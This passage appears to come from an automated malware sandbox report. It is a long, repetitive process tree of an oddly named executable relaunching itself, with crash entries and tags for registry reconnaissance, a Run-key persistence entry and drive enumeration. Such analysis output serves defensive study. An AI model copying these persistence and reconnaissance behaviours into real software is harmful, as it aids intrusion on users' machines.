- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10680 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8736 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Adds Run key to start application
- Enumerates connected drives
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
